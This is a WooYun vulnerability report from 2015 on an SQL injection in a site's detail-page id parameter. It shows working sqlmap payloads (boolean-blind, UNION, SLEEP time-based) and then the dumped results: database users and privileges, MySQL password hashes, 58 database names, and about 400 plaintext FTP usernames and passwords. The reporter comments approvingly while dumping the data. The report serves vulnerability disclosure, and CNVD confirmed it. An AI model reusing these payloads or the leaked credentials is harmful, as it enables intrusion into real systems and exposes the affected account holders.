乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-26: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-05: 细节向核心白帽子及相关领域专家公开 2015-09-15: 细节向普通白帽子公开 2015-09-25: 细节向实习白帽子公开 2015-10-10: 细节向公众公开
**.**.**.**/index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND 3632=3632 AND (6265=6265.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71 Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: http://**.**.**.**:80/index.php/Information/detail/id/-1506) UNION ALL SELECT NULL,CONCAT(0x7165756b71,0x444e4f43704a46615465,0x71656b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND SLEEP(5) AND (4657=4657.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71---[22:01:55] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.6back-end DBMS: MySQL 5.0.11
OK,注入出来啦,可以爆的都爆一下。
database management system users privileges: [*] 'camarine'@'localhost' [5]: privilege: DELETE privilege: FILE privilege: INSERT privilege: SELECT privilege: UPDATE[*] 'chinaswsftproot'@'localhost' [1]: privilege: USAGE[*] 'cssc2013test'@'localhost' [1]: privilege: USAGE[*] 'haiguan'@'%' [5]: privilege: DELETE privilege: FILE privilege: INSERT privilege: SELECT privilege: UPDATE[*] 'jnhr'@'localhost' [4]: privilege: DELETE privilege: INSERT privilege: SELECT privilege: UPDATE[*] 'jzshipyard'@'localhost' [1]: privilege: USAGE[*] 'ppship'@'localhost' [1]: privilege: USAGE[*] 'root'@'**.**.**.**' (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE[*] 'root'@'localhost' (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE[*] 'root'@'myweb' (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE[*] 'safe'@'%' [5]: privilege: DELETE privilege: FILE privilege: INSERT privilege: SELECT privilege: UPDATE[*] 'sem'@'localhost' [1]: privilege: USAGE[*] 'ship_news'@'localhost' [5]: privilege: DELETE privilege: FILE privilege: INSERT privilege: SELECT privilege: UPDATE[*] 'snm'@'localhost' [1]: privilege: USAGE[*] 'webgroups'@'localhost' [1]: privilege: USAGE
[22:03:38] [INFO] fetching current usercurrent user: 'root@localhost'[22:03:38] [INFO] fetching current databasecurrent database: 'hyxh2015'[22:03:39] [INFO] testing if current user is DBA[22:03:39] [INFO] fetching current usercurrent user is DBA: True
database management system users password hashes:[*] camarine [1]: password hash: *DC7EFD837AC582C89495EEB9A151551990123587[*] chinaswsftproot [1]: password hash: *195C522FD075434029DBE1802248E960D9BAE5D1[*] cssc2013test [1]: password hash: *7E2E5DEC0B7F78DF8E7DE58F443946B590C3F8EF[*] haiguan [1]: password hash: *1D4C1F5D816E2615855960950EA2E89137CC9122[*] jnhr [1]: password hash: *D58A30681E3BD72168A55066128F55C09787F8CB[*] jzshipyard [1]: password hash: *98DC96620A8995520AE77F00E09377696460BD55[*] ppship [1]: password hash: *371CE96874B45FF9696D6A318410CAD28C2CC6A2[*] root [2]: password hash: *83DD22310DC886D501A708D45688B9A3CFAB0138 password hash: *A889171F7E4E2E8329F7AAE374FF2E6ACB5748B7[*] safe [1]: password hash: *C9F948E5C5D874A5662335DDBAEA44A60BE2CA50[*] sem [1]: password hash: *3CEB3C4C2C6397298255016F6C5131CF25998C00[*] ship_news [1]: password hash: *55ECE92BF1801C26152BD69F3473FAB1CA4EE1DF[*] snm [1]: password hash: *E6C21ED59FE6A4C4940BDA05B115D3DCD5798CFB[*] webgroups [1]: password hash: *191E6263C8FAE53513E8C084453D6029F1890E12
available databases [58]: [*] action1[*] auser_hbeg[*] bugfree[*] camarine[*] cdcol[*] chinasws2014[*] chinasws2014_cn[*] chinaswsftp[*] csit2014[*] csit2410_new[*] cssc2013entest[*] cssc2013test[*] cssc_jnzc150[*] dbtest[*] ftp[*] guest_dbs[*] haiguan[*] haiguant[*] hyxh2015[*] information_nw[*] information_schema[*] jnhr[*] jy[*] jydiscuz2[*] material[*] mysql[*] phpcms[*] phpcms_d[*] phpcms_m[*] phpcms_n[*] ppship[*] safemanage[*] sem[*] ship_news[*] ship_news_1[*] technology[*] technologydl[*] technologydl1[*] technologydl1_cn[*] technologydl_cn[*] test[*] web_bjhyjs[*] web_hh[*] web_hh_en[*] web_huahai_en[*] web_old_sh_shipyard[*] web_waxc[*] web_wuhu[*] web_wuhu_en[*] webgroups_chinasws[*] webgroups_cstc[*] webgroups_cstc_e[*] webgroups_cstc_e_2014test[*] webgroups_jxjz[*] webgroups_snm[*] webgroups_snm_en[*] wuhu[*] wuhu_en
此处,58个数据库,这么多敏感信息,而且竟然有个ftp,果断爆它。
Database: ftpTable: user[400 entries]+------------+-------------+| username | password |+------------+-------------+| hhm-dc | dc1465 || hhm-plks | plks6514 || hhm-yge | yge6354 || hhm-cc | cc4596 || hhm-shsh | shsh8547 || hhm-sl | sl8752 || hhm-xm | xm4564 || hhm-kw | kw7841 || hhm-tx | tx5465 || hhm-zc | zc1005 || hhm-ryh | ryh6546 || hhm-ml | ml0204 || hhm-ms | ms5401 || hhm-ljdq | ljdq5302 || hhm-komet | komet4923 || hhm-jd | jd4553 || hhm-bs | bs6565 || hhm-dljc | dljc5464 || hhm-knfs | knfs6346 || hhm-cd | cd2584 || hhm-sd | sd1285 || hhm-zr | zr2125 || hhm-lhjh | lhjh0236 || hhm-bzjl | bzjl2554 || hhm-jlsy | jlsy5266 || hhm-qd | qd6952 || hhm-db | db3265 || hhm-fed | fed1321 || hhm-jytw | jytw6521 || hhm-lf | lf2106 || hhm-qg | qg8752 || hhm-xxgm | xxgm0548 || hhm-yxtz | yxtz5812 || hhm-yl | yl9822 || hhm-zlth | zlth8754 || hhm-az | az5225 || hhm-jel | jel5854 || hhm-hst | hst6234 || hhm-sljx | sljx5667 || hhm-jo | jo2130 || hhm-kh | kh6654 || hhm-wl | <blank> || hhm-yh | yh3216 || hhm-zs | zs6545 || hhm-zxxs | zxxs9872 || hhm-yq | yq5054 || hhm-jlzz | jlzz5458 || hhm-hf | hf8983 || hhm-fr | fr5045 || hhm-cj | cj7446 || hhm-jw | jw5545 || hhm-klk | klk5215 || hhm-mg | mg3638 || hhm-ntcb | ntcb3511 || hhm-nthh | nthh1697 || hhm-tlzg | tlzg0687 || hhm-rc | rc0688 || hhm-sj | sj9663 || hhm-shxx | shxx8686 || hhm-xyjd | xyjd8696 || hhm-cgst | cgst8018 || hhm-yhgm | yhgm4923 || hhm-clx | clx9815 || zhongshe | zhongshe123 || hhm-awc | awc5454 || hhm-yhcb | yhcb6561 || hhm-mts | mts1225 || hhm-bx | bx6544 || hhm-jysm | jysm8721 || hhm-yljs | yljs1221 || hhm-zzscl | zzscl4556 || hhm-zj | zj2332 || hhm-zsdl | zsdl5689 || hhm-hgd | hgd3233 || hhm-dbrx | dbrx4598 || hhm-hkjd | hkjd2121 || hhm-mwsb | mwsb5454 || hhm-ffdq | ffdq5346 || hhm-thgj | thgj6654 || hhm-jdgzq | jdgzq2312 || hhm-yfjx | yfjx3213 || hhm-kymy | kymy6545 || hhm-wydq | wydq2165 || hhm-cmd | cmd6549 || hhm-htpj | htpj5468 || hhm-jlc | jlc5217 || hhm-shhx | shhx0541 || hhm-dy | dy6518 || hhm-lcmy | lcmy6563 || hhm-rr | rr2136 || hhm-tl | tl5245 || hhm-cxd | cxd5654 || hhm-jshy | jshy5752 || hhm-jbby | jbby0246 || hhm-jlsj | jlsj2872 || hhm-dp | dp0465 || hhm-hb | hb5268 || hhm-shhz | shhz2188 || hhm-shzs | shzs6384 || hhm-xad | xad2887 || hhm-sdy | sdy2046 || hhm-xz | xz4684 || hhm-rm | rm6532 || hhm-zy | zy9832 || hhm-yycb | yycb5478 || hhm-bh | bh2154 || hhm-hybf | hybf2468 || hhm-whxsj | whxsj1122 || hhm-zxth | zxth1212 || hhm-tydz | tydz3434 || hhm-lygl | lygl3344 || hhm-jbsy | jbsy5656 || hhm-fd | fd5566 || hhm-dq | dq6655 || hhm-bn | bn6565 || hhm-bdzg | bdzg7788 || hhm-nhzn | nhzn8787 || hhm-yscb | yscb7878 || hhm-pldz | pldz8877 || hhm-sfwl | sfwl7778 || hhm-sda | sda8887 || hhm-xelt | xelt8777 || hhm-bjzc | bjzc3939 || hhm-jsjy | jsjy9393 || hhm-dlcy | dlcy2828 || hhm-jshd | jshd8282 || hhm-shjc | shjc3399 || hhm-shmh | shmh9933 || hhm-zgsy | zgsy3939 || hhm-gzwj | gzwj1201 || hhm-ksxf | ksxf1202 || hhm-wssy | wssy1203 || hhm-cgklp | cgklp1204 || hhm-cjsy | cjsy1205 || hhm-fgyq | fgyq1206 || hhm-hks | hks1207 || hhm-nlgm | nlgm1208 || hhm-sqdz | sqdz1210 || hhm-xcdq | xcdq1211 || hhm-zznl | zznl1212 || hhm-shsn | shsn1209 || hhm-dykj | dykj1213 || hhm-megyl | megyl1214 || hhm-dycb | dycb1215 || hhm-zjcb | zjcb1216 || hhm-bskj | bskj1217 || hhm-cshz | cshz1218 || hhm-jszm | jszm1219 || hhm-dhlz | dhlz1220 || hhm-dgzd | dgzd1221 || hhm-kyjd | kyjd1222 || hhm-tyfdj | tyfdj1223 || hhm-ydjf | ydjf1224 || hhm-hksk | hksk1225 || hhm-qsl | qsl1226 || hhm-lksl | lksl1227 || hhm-taswd | taswd1228 || hhm-ctwl | ctwl1229 || hhm-cxrj | cxrj1230 || hhm-mlzk | mlzk1231 || hhm-nok | nok0101 || hhm-ksjj | ksjj0102 || hhm-dad | dad0103 || hhm-mhjd | mhjd0104 || hhm-dllt | dllt0105 || hhm-tddl | tddl0106 || hhm-stbsh | stbsh0107 || hhm-ssjd | ssjd0108 || hhm-remy | remy0109 || hhm-syjc | syjc0110 || hhm-wxly | wlxy0111 || hhm-glsz | glsz0112 || hhm-jwhr | jwhr0113 || hhm-hjjx | hjjx0114 || hhm-bmrj | bmrj0201 || hhm-cbys | cbys0202 || hhm-jnyy | jnyy0203 || hhm-zymy | zymy0204 || hhm-zwl | zwl0205 || hhm-stm | stm0206 || hhm-jya | jya0207 || hhm-hldq | hldq0208 || hhm-shhq | shhq123 || hhm-SHEPK | shepk123 || hhm-SHGZCB | shgzcb123 || hhm-CQJZ | cqjz123 || hhm-JGS | jgs123 || hhm-SHKL | shkl123 || hhm-SHSZ | shsz123 || hhm-SHSJ | shsj123 || hhm-SHGJ | shgj123 || hhm-711 | 711123 || hhm-czsl | czsl123 || hhm-njdn | njdn123 || hhm-njhbsr | njhbsr123 || hhm-shgst | shgst123 || hhm-shsy | shsy123 || hhm-jsac | jsac123 || hhm-shhf | shhf123 || hhm-shsf | shsf123 || hhm-shzy | shzy123 || hhm-czflt | czflt123 || hhm-hfra | hfra123 || hhm-njky | njky123 || hhm-shdp | shdp123 || hhm-shht | shht123 || hhm-shkwx | shkwx123 || hhm-czck | czck123 || hhm-hzhc | hzhc123 || hhm-njgc | njgc123 || hhm-szxd | szxd123 || hhm-wdwd | wdwd12 || hhm-sxzs | sxzs123 || hhm-shgg | shgg123 || hhm-scjs | scjs123 || hhm-hydz | hydz123 || hhm-htkq | htkq123 || hhm-shzb | shzb123 || hhm-bsplks | bsplks123 || hhm-mggj | mggj123 || hhm-rhcb | rhcb123 || hhm-xxkz | xxkz || hhm-wrt | wrt123 || hhm-ef | ef123 || hhm-df | df123 || hhm-jydl | jydl123 || hhm-tn | tn123 || hhm-zgshsh | zgshsh123 || hhm-fqn | fqn123 || hhm-bsxx | bsxx123 || hhm-jj | jj123 || hhm-sc | sc123 || hhm-ty | ty123 || hhm-wz | wz123 || hhm-hsflks | hsflks123 || hhm-lp | lp123 || hhm-aszy | aszy123 || hhm-ddwy | ddwy123 || hhm-dgdl | dgdl123 || hhm-xacb | xacb123 || hhm-hdk | hdk123 || hhm-jezl | jezl123 || hhm-nh | nh123 || hhm-xzkc | xzkc123 || hhm-rp | rp123 || hhm-xg | xg123 || hhm-znql | znql123 || hhm-nek | nek123 || hhm-zyth | zyth123 || hhm-jne | jne123 || hhm-wtq | wtq123 || hhm-12s | 12s123 || hhm-cz | cz123 || hhm-aty | aty123 || hhm-hcjd | hcjd123 || hhm-scyq | scyq123 |+------------+-------------+
400个,感觉好腻害的样子。OK,先这样。
同上。
你们专业。
危害等级:高
漏洞Rank:10
确认时间:2015-08-26 20:05
CNVD确认并复现所述漏洞情况,已经转由CNCERT,由其后续协调网站管理单位处置。
暂无